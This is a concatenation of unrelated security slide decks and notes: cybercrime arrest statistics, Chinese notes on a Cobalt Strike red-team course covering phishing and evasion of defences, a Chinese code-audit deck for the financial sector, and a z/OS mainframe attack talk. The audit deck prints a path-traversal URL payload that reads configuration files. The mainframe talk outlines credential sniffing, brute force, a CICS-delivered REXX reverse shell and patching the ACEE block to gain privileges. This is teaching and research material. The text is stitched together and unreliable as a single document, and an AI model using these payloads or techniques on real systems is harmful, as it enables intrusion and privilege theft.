Most%Friends%On%The%Internet
It’s&Tom!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1980’s%W MySpace Tom
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1980’s%W MySpace Tom
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1980’s%W MySpace Tom
• Tom Andersen aka Lord Flathead
– Aka Myspace Tom
– 1985-10-01
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1980’s%W MySpace Tom
• Tom Andersen aka Myspace Tom
• 1985-10-01
• 14 or16 years old at the time
• Hacked into Chase Manhattan bank and told friends
how to do it.
• FBI raid in California and as a result had all
computers seized by federal authorities.
• No charges or criminal convictions have ever been
made in relation to this incident.
– He was a minor at the time.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Many%Stories%To%Be%Told
Each incident in Arrest
Tracker has a story to
be told.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
1990’s
Kevin Mitnick
Max Butler
Kevin Poulsen
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2000’s
Albert
Gonzalez
Adrian Lamo
Jeanson James
Ancheta
Owen Thor Walker
Jonathan Joseph James
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
2010’s
Aaron Swartz
Sabu
Barrett Brown
Weev
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Other%Notable%Arrests
Many other notable arrests for various reasons:
• First prosecution of a particular type of crime
• Severity of the crime
• Length of jail time or fines
• Over reaching regulatory actions
• Impact to those accused
• Etc.
Arrest Tracker
Statistics
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Age
• Youngest Arrest
– 12 Years Old
– Traded pirated
information to the
hacktivist group
Anonymous for video
games.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Age
• Oldest Arrest
– John McHugh aka Devilman
– 66 Years Old
– Busted for selling cards on
darkweb.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Age
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Age
Average Age Is Currently
27.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Age
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Gender%Statistics
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Gender%Statistics
Male%– 1,122%(81.8%)
Female%– 33%(2.4%)
Unknown%– 215%(15.6%)
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Nationality
Which Countries Do
Most Hackers Reside?
aka
Country of Origin For
Arrest
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Nationality
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Nationality%– Based%On%Arrests
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Collectives
• Total of 58 known collectives that have had an
confirmed incident:
– Anonymous: 130
– Western Express Cybercrime Group: 17
– Legion Of Doom: 16
– Pirates with Attitudes: 15
– Masters of Deception: 8
– Nihilist Order: 7
– LulzSec: 7
– Chaos Computer Club: 6
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Operations
• Total of 21 known Hacker Operations that
have had a confirmed incident:
– OpPayBack: 21
– OpPayPal: 14
– Antisec: 7
– OpTitstorm: 4
– OpItaly: 2
– OpScientology: 2
Arrest Inevitable?
Are%You%Definitely%Arrested?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Data%Breaches%vs%Arrests
• ~2,000 data breaches 2016 YTD
–70 confirmed arrests YTD
• ~4,000 data breaches in 2015
–134 confirmed arrests
• ~3,000 data breaches in 2014
–47 confirmed arrests
• No where near the “arrests” based on the
amount of data breaches
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Crime%To%Incident
The data so far shows
there are 610 days on
average between the
“crime” to the incident or
arrest.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Days%Of%The%Week%– Most%Likely%To%Be%Arrested
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Days%Of%The%Week%– Monday
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Months%Of%The%Year%– Most%Likely%To%Be%Arrested
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Months%Of%The%Year%– Most%Likely%To%Be%Arrested
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Countries%Pursuing%Cyber%Crime
• As most can easily guess USA, is the most active, in
computer crime enforcement.
• But the Top 10 might surprise you!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Countries%W Extradition
• Extraditions:
– Currently, only the USA has any extraditions tracked.
• 42 total
– Top 5 Countries
• Russia to United States: 8
• Romania to United States :7
• Estonia to United States: 6
• Canada to United States: 3
• United Kingdom to United States: 3
• Not every country allows the USA to extradite:
– The United States has extradition treaties with more
than 100 countries.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Countries%W Extradition
United&States&of&America&(shown&in&purple)&has&extradition&treaties&with&the&countries&
shown&in&light&blue
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Jail%Time
• Longest Jail Time
– 334 years!
• Onur Kopçak, Turkey
• Created fake websites that impersonated banks in order to
steal people’s banking details in a phishing scam
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Fines
• Average Fine
– ~1 Million USD
• Most Common Fine
– $5,600 (occurred 13 times)
• Largest Fine
– Viktor Pleshchuk
– $8.9 Million USD
– Worldpay hacker, convicted and tried in Russian court
under FBI charges.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Once%Arrested,%How%Many%Arrested%Again?
• Some people just can’t stop themselves
• Many times multiple cases over years are
consolidated into one case
• But confirmed that 17 People have had
Multiple Arrests
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Once%Arrested,%How%Many%Assist%Authorities
• We are asked all the time, how many
people are assisting the authorities.
• Arrest Tracker does have fields to track
this, however, it is extremely rare and
hard to find this data for most incidents.
• Currently, there are 30 persons that are
confirmed to have Assisted Authorities.
Cyber Crime
What%Is%The%Profile%Of%A%“Hacker”?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Profile%Of%A%Hacker
The data suggests there is
no single type of “Hacker”
or Cyber Criminal.
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Profile%Of%A%Hacker%– TELL%US!
• Gender: Male
• Age: 27 (on average)
– Range between 18 and 35
• Location: USA
– If not, then UK or Philippines
• Crime: Hacking
– If not, then Cyber Fraud, or Data Theft
• Active Since 2000
• Motivation: Still Unclear
Most Wanted
Who%Hasn’t%Been%Arrested%Yet?
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted
• https://www.fbi.gov/wanted/cyber
• 26 Total Listed As Of 8/1/2016
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted%W Profiles
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted%W Profiles
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted%W Profiles
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
FBI’s%Most%Wanted
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Ghostshell Revealed
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Ghostshell Revealed
• Revealed in March 2016 but still active!
So What’s Next?
Actions
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Data
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Future
• We are still working to ensure we are
using the best data
• If you find something wrong, please
contact us.
• We care about the data and want it to
be accurate.
• We want more data!
–Increase coverage of cyber crime incidents
–More data fields per incident and by person
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Future
Future ideas/features:
• Add more tracking data about individual persons
– Ability to handle complex issues such as Romania nationally,
lived in Canada for 15 years, then arrested in USA
– Add ability to track motivation
– Add mapping to Data Breaches
• More work on “Most Wanted”
– How long they were FBI most wanted, until arrested.
• Where are they now information?
– How many work for security companies?
• Subsection for piracy related cases
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Arrest%Tracker%Future
• What comes next?
–Will we see arrests increase or decrease?
–Will we see changes in legal environments
leading to more arrests?
• Can we take Arrest Tracker information and
apply it to your work!
• What new features / ideas do you want to
see?
–Open to feedback!
• And if you want to help…………..
–Please contact us!
N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y%
cyber
Thank%you!
• Lee&Johnstone&(RBS)
• Brian&Martin&(RBS)
“Cyber” Who Done It?!
Attribution Analysis
Through Arrest History
Jake%Kouns,%CISO
[email protected]
@jkouns
August&2016
Lee%Johnstone
Security%Researcher
@83leej | pdf |
Red Team Ops with CS: Operations
0x00 前言
CS的作者Raphael Mudge有2套公开视频,非常值得学习,一个是18年的《In-memory Evasion》,一
个是19年的《Red Team Operations with Cobalt Strike》。前段时间再次观看了《In-memory
Evasion》并作了相应笔记,而《Red Team Operations with Cobalt Strike》始终没有完整的看过一
遍,正好这次一口气搞完。学习一定要做笔记,能写出工具的一定要写成工具。
《Red Team Operations with Cobalt Strike》这个课程分为了9个部分,分别是:
Operations(运营)
Infrastructure(基础设施)
C2(命令和控制)
Weaponization(武器化构建)
Initial Access(初始化权限获取)
Post Exploitation(后利用)
Privilege Escalation(权限提升)
Lateral Movement(横向移动)
Pivoting(中转)
在第一部分运营中,作者先介绍了以邮件钓鱼为例子的整个攻击链和攻击链上防御手段,然后讲解了“逃
逸思想”,最后是解释了一些CS的运营相关的知识。
0x01 攻击链以及相应防御手段
作者以邮件投递钓鱼为例讲解整个攻击链,邮件钓鱼一直是APT中最常见的初始化权限获取手法,以此
为例非常合适,下图是我整理的整个攻击链以及相应防御手段:
真的是一路过关斩将,太不容易了,恶意邮件投递会经过以下防御手段:
如果你DMARC、DKIM、SPF等邮件发送服务器没有配置好,很有可能被反垃圾邮件和反钓鱼邮件
过滤自动拦截。
mail antivirus gateway or sandbox,沙箱技术会自动打开你的附件或者访问邮件中的url,然后判
断是否是恶意。
当邮件附件落地后,会有各式各样的终端安全产品(A/V)来一波静态的和简单的动态分析
如果主机上有应用白名单策略,你这个来源不明的可执行程序还需要绕过应用白名单策略,用什么
白加黑之类的手法。
植入体执行起来会有各种进程、线程、内存操作,然后反病毒产品,各种EDR就开始记录你的相关
行为,稍微不注意就触发恶意规则,然后被拦截上报
过了这一关,接下来就是出网问题,防火墙策略、代理上网、域名分类、域名白名单等等限制C2出
网。
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 1 / 5 - Welcome to www.red-team.cn
同时网络监控设备一直分析监控流量,稍微流量异常就可能触发告警。
即使过了这一次,威胁情报对域名和IP、样本等分析,例如C2的TeamServer被全网测绘识别了,
导致IP被标记。
植入体正常启动运行并回连以后,就是后利用了,例如:横向移动、截屏、键盘记录、本机信息收
集、网络信息收集等等,每一个行为都可能被EDR做侦测,被EDR云端的机器学习、人工分析给标
记为恶意。
要完成一次成功的红队行动,前期既要完整的bypass所有防御,后期还要思考驻留办法,防止被云端分
析样本存活时间太短。
0x02 逃逸哲学
作者讲到这个部分的时候,非常有共鸣,他有一下观点:
CS不是一个魔法棒,不可能对抗你所遇到的所有防御和场景。
但是:CS提供了选择+扩展
如何成功逃逸(Evasion)
理解你所使用的工具和它产生的行为(知己)
评估和理解防御机制(知彼)
做出一个最好的选择,然后执行(评估执行)
通过”如果成功逃逸“这3点总结,其实就是一个红队人员的成长路径,先学会理解使用各种攻击工具、然
后学习理解防御机制、再修改攻击方法bypass防御机制,最后在知己知彼以后做出一个最佳选择。红队
行动就是在不停的重复”了解目标、选择攻击方法、抉择并执行攻击方法“的过程中完成的。
0x03 CS运营相关知识
CS的使命和愿景
使命:弥补渗透测试工具和高级威胁恶意软件之间的差距
愿景:有用的、可信的对手模拟工具
培育身经百战的安全分析师
驱动客观的有意义的安全提升
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 2 / 5 - Welcome to www.red-team.cn
培训安全专业人才和高级威胁策略的决策者
分散操作
作者分享了一些最佳实践,用多个TeamServer做功能分离
作者建议最好分开搭建3个TeamServer用作不同目的:
Staging
用作初始化权限时候的Teamserver,可能你是钓鱼或者其他方式获取的初始化权限,你会在
上面使用提权或者横向移动等等操作,由于你开始对目标环境不是很熟悉,难免会触发告警,
这个teamserver被发现的可能基本上是100%,因此在被发现之前尽快横向移动到其他机器,
然后建立long haul的Teamserver,也就是我们说的潜伏通道。
long haul
潜伏通道,基本不做任何操作,再红队行动的生命周期中保持存活,防止其他通道失败的时
候,还可以唤起新的post-ex通道。
潜伏通道保持着低速的回连频率
post-ex
这个是后利用通道,就是执行各种命令操作横向移动的通道。
这是单个目标的最佳时间,如果同时服务于多个目标的红队评估,作者提供了如下的最佳实践:
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 3 / 5 - Welcome to www.red-team.cn
Target Cell
负责具体的目标网络
获取权限、后利用和横向移动
维护本目标的此次任务的基础设施
Access Management Cell
保存所有目标网络的权限
获取权限和接受Target Cell给的权限
当Target Cell权限掉了的时候,给Target Cell新的权限
维护全局的基础设施为了持久化回连
团队人员配置
在当前的高强度的攻防对抗中,一个人很难在短时间内完成大量的评估演练工作,因此团队化作战是必
然的情况,作者给了他自己的思考和最佳实践。
Access(打点)组
主要是初始化立柱点获取,他们主要的工作就是初始化权限获取的武器化,和横向移动的武器
化
Post-Exploitation(后利用)组
主要信息收集、数据挖掘、用户监控、键盘记录、截屏等等,在目标网络中寻找最终目标(靶
标)
Local Access Manager(shell Sherpa)权限维持组
管理回连
配置基础设施
持久化权限维持
和Access Management Cell保持沟通
这个团队人员配置,说的是target cell的配置,尼玛,这经验不愧是从老美空军出来的大哥。一看就是见
过大场面的。上面人员配置中组可能就是一个人或者多个人。其中权限维持组和全局的权限维持团队沟
通。整体人员配置看,在权限控制这一块儿都投入了大量人员和精力。也非常符合实战中,权限控制是
整个行动中的难点的特征。
0x04 总结
这第一部分其实和CS相关的知识并不多,大部分是讲红队相关东西,非常的干货,从攻击链到红队团队
人员分配,很多结论都是实际经验中总结出来的,收获颇丰。我省略了视频中关于Beacon、Malleable
C2、Aggressor Script以及log和report相关的基础功能介绍。本部门总体来看,都是作者的经验总结出
来的最佳实践,非常值得学习,不管实在红队评估还是攻防演练中都非常有借鉴意义,结合自身团队实
际情况,灵活的配置团队技术能力。
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 4 / 5 - Welcome to www.red-team.cn
Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-28
No. 5 / 5 - Welcome to www.red-team.cn | pdf |
我是谁
姓名:董弘琛
ID:月白
90后白帽子,360网络安全专家,擅长渗透测试、
代码审计、脚本开发等相关安全技能。金融行业相
关安全服务经验丰富,希望能和各位师傅们交流学
习更多的知识。
同时也感谢我的领导、团队以及主办方对我的帮助
与支持。
先来聊聊代码审计
什么是代码审计?
为什么要代码审计?
如何进行代码审计?
什么是代码审计
检查源代码中的安全缺陷,检查程序源代码是否存在
安全隐患,或者有编码不规范的地方,通过自动化工
具或者人工审查的方式,对程序源代码逐条进行检查
和分析,发现这些源代码缺陷引发的安全漏洞,并提
供代码修订措施和建议。
什么是代码审计
就是在代码中寻找安全隐患
什么隐患?
如何寻找?
为什么代码审计
网络安全风险
白盒测试
代码审计收益
如何代码审计
代码审计的基本流程
确认审计
主体
确认系统使用的语
言、框架、版本信
息,开发文档等等。
对系统代码有清晰
的认知。
进行审计
挖掘漏洞
结合使用自动化工
具与人工审计,高
效而又细致的对系
统进行审计。
汇总并提供
修复方案
对审计出的漏洞进
行汇总,给出相应
的修复方案并协助
修复。
复测或
定期审计
代码并非一成不变,
漏洞也一样,定期
的代码审计同样重
要。
代码审计中的难点
语言繁多,组合使用
代码混乱,结构复杂
..\\..\\..\\App\\Common\\Conf\\db.php
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==
..\\..\\..\\App\\Common\\Conf\\config.php
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA=
http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/
Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA==
金融行业的安全背景
数字化进程的加快
由线下到线上的快速转变
行业监管要求日益严格细化
制度体系进一步完善
金融行业的安全风险
漏洞威胁
攻击威胁
代码本身
黑客攻击频繁、漏洞越挖越快、零DAY频出
不讲武德,网络攻击组织化与全球化
代码产出时便埋下的隐患
金融行业的安全漏洞
SQL注入
SQL注入:JDBC、Hibernate、Mybatis
跨站脚本
存储型XSS、反射型XSS、基于DOM的XSS
命令注入
不可信赖的数据导致程序执行恶意命令
HTTP响应截断
不可信赖的数据置于HTTP头文件中发出
密码管理
硬编码密码、配置文件中的明文密码、弱加密
XML注入
向XML文档中写入未经验证的数据
路径遍历
不可信赖的数据构成路径
XML外部实体注入
对非安全的外部实体数据进行处理
动态代码解析
程序运行时动态解析源代码指令受到攻击
组件漏洞
使用存在漏洞的组件
SQL注入:JDBC
拼接 SQL 语句
参数化查询
无效的参数化查询
用户输入
直接作为SQL指令的一部分
先编译带有占位符的SQL语句
将占位符替换为用户输入
SQL注入: Mybatis
在 MyBatis 中,使用 XML 文件 或 Annotation 来
进行配置和映射,将 interfaces 和 Java POJOs
映射到 database records
•
简化绝大部分 JDBC 代码、手工设置参数和获取结果
•
灵活,使用者能够完全控制 SQL,支持高级映射
MyBatis XML
Mapper Interface
XML 配置文件
#{ }
${ }
#{ }
${ }
存在着一些不能直接使用#{ }的情况
ORDER BY
LIKE
IN
如何避免使用${ }呢?
SQL注入:Hibernate
Hibernate 它使用时只需要操纵对象,使开发更对象
化,抛弃了数据库中心的思想,是完全的面向对象思
想。同时拥有简洁的 HQL 编程。
敢把我给忘了?
HQL 注入
位置参数
命名参数
类实例
路径遍历
组件安全
开源组件带来的安全隐患
组件漏洞
难以排查,系统中存在大量的组件,版本不一
难以维护,部分组件不再更新或者更新缓慢
难以修复,部分组件漏洞很难或需要大量时间
精力进行修复
安全组件带来的安全防护
组件分类
组件名称
业务功能安全组件
文件安全上传组件
文件安全下载组件
密码找回组件
分步提交组件
数据脱敏组件
防篡改组件
攻击防护安全组件
防短信炸弹组件
防重放组件
防越权访问组件
组件分类
组件名称
安全工具组件
Cookie保护组件
加密算法组件
Token组件
随机数生成器
业务安全日志
编码组件
攻击防护安全组件
防sql注入组件
防XSS跨站组件
防扫描器组件
防直接对象引用
代码安全解决方案
防患于未然:将代码安全融入系统整个安全生命周期。
发布
需求
设计
实施
测试
IT投入占比与网络安全领域投入占比
数据来源于《金融行业网络安全白皮书》
代码审计分析平台
代码安全解决方案
酒仙桥六号部队
个人微信
雪狼别动队 | pdf |
© WAVESTONE
1
Ayoub ELAASSAL
[email protected]
@ayoul3__
Dealing the perfect hand
Shuffling memory blocks on z/OS
© WAVESTONE
2
What people think of when I talk about
mainframes
© WAVESTONE
3
The reality: IBM zEC 13 technical specs:
• 10 TB of RAM
• 141 processors,5 GHz
• Dedicated processors for JAVA, XML and
UNIX
• Cryptographic chips…
Badass Badass Badass !!
So what…who uses those anymore ?
© WAVESTONE
https://mainframesproject.tumblr.com 6
© WAVESTONE
7
About me
Pentester at Wavestone, mainly hacking Windows and Unix stuff
First got my hands on a mainframe in 2014…Hooked ever since
When not hacking stuff: Metal and wine
•
github.com/ayoul3
•
ayoul3__
© WAVESTONE
8
This talk
Why we should care about mainframes
Quick recap on how to execute code on z/OS
Playing with z/OS memory layout
© WAVESTONE
9
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
© WAVESTONE
10
The wonders of TN3270
The main protocole to interact with a Mainframe is
called TN3270
TN3270 is simply a rebranded Telnet
…Clear text by default
X3270 emulator if
you don’t have the
real thing
© WAVESTONE
11
The wonders of TN3270
© WAVESTONE
12
Damn EBCDIC
© WAVESTONE
13
Ettercap dissector by @Mainframed767
[DEMO ETTERCAP]
© WAVESTONE
14
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
© WAVESTONE
15
Time Sharing Option (TSO)
Tsk tsk tsk… too friendly!
TSO is the /bin/bash on z/OS
© WAVESTONE
16
Bruteforce
Nmap script by @Mainframed767
© WAVESTONE
17
Bruteforce is still surprisingly effective
Passwords derived from login
Windows : 5%
Mainframe : 27%
© WAVESTONE
18
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
© WAVESTONE
19
© WAVESTONE
20
© WAVESTONE
21
© WAVESTONE
22
Interactive applications
CICS is a combination Drupal and Apache Tomcat…before it
was cool (around 1968)
Current version is CICS TS 5.4
Most interactive applications on z/OS rely on a middleware
called CICS
© WAVESTONE
23
If we manage to “exit” the application, we can instruct CICS to
execute default admin programs (CECI, CEMT, etc.) => rarely
secured
CICS: a middleware full of secrets
@ayoul3__
As usual, some API functions are particularly interesting!
CECI offers to execute CICS API functions
© WAVESTONE
24
[DEMO SPOOLOPEN
© WAVESTONE
25
INTRDR = Internal Reader, is the equivalent of
/bin/bash. It executes anything it receives
© WAVESTONE
26
The theory
@ayoul3__
© WAVESTONE
27
The theory
@ayoul3__
© WAVESTONE
28
The theory
@ayoul3__
© WAVESTONE
29
Reverse shell in JCL & REXX
We allocate a new file (dataset)
Reverse shell in REXX – python-like
a scripting language
Execution of the file
© WAVESTONE
30
[DEMO CICSPWN]
© WAVESTONE
31
Quick recap on how to execute code on z/OS
Sniffing credentials
Good ol’ bruteforce
Go through the middleware
And many more (FTP, NJE, etc.)
Check out Phil & Chad’s talks !
© WAVESTONE
32
LISTUSER command
© WAVESTONE
33
Shell on z/OS, now what ?
There are three main security attributes on RACF :
•
Special : access any system resource
•
Operations : access all dataset regardless of RACF rules
•
Audit : access audit trails and manage logging classes
The most widespread security product on z/OS is RACF. It
performs authentication, access control, etc.
© WAVESTONE
34
This talk
Why we should care about mainframes
Quick recap on how to execute code on z/OS
Playing with z/OS memory layout
© WAVESTONE
35
Z architecture
Proprietary CPU (CISC – Big Endian)
Three addressing modes: 23, 31 & 64 bits.
Each instruction has many variants: memory-memory,
memory-register, register-register, register-immediate, etc.
16 general purpose registers (0 – 0xF) (+ 49 other registers)
The PSW register holds control flags and the address of the
next instruction
© WAVESTONE
36
Security context in memory
z/OS memory is full of control blocks: data structures
describing the current state of the system
RACF stores the current user’s privileges in the ACEE control
block…We just need to find it!
© WAVESTONE
37
Security context in memory
PSA
ASCB
PSAAOLD
0
548
Address Space
Control Block
Always
starts at
virtu. addr
0
ASCBASXB
108
ACEE
USER FLAGS
1... .... SPECIAL
..1. .... OPERATIONS
…1 .... AUDITOR
ASXB
Address Space
Extension Block
ASXBSENV
200
38
If we patch byte 38 we’re good to go!
© WAVESTONE
38
Program State Word (PSW)
ABEND S0C4, code 4: Protection exception.
© WAVESTONE
39
Memory protection
Same concept of virtual memory and paging as in Intel (sorta)
Each page frame (4k) is allocated a 4-bit Storage key + Fetch
Protection bit at the CPU level
16 possible Storage key values
0 – 7 : system and middleware. 0 is the master key
8 : mostly for users
9 – 15 : used by programs that require virtual = real memory
© WAVESTONE
40
Program State Word (PSW)
8 - 11 bit : current protection key, 8 in this case
Next instruction
Control flags
© WAVESTONE
41
Memory protection
Storage keys match
Storage don't match
& Fetch bit ON
Storage don't match
& Fetch bit OFF
PSW key is zero
Full
Full
Full
PSW key is not zero
Full
None
Read
© WAVESTONE
42
Problem state Vs Supervisor state
Some instructions are only available in Supervisor state (kernel
mode) :
•
Cross memory operations
•
Direct Storage Access
•
Changing storage keys
•
Exit routines
•
Listening/editing/filtering system events
•
Etc.
© WAVESTONE
43
Program State Word (PSW)
Problem mode ~ User mode
Supervisor mode ~ Kernel mode
15 - 16 bit : Problem mode is ON in this case (D =1101)
Next instruction
Control flags
© WAVESTONE
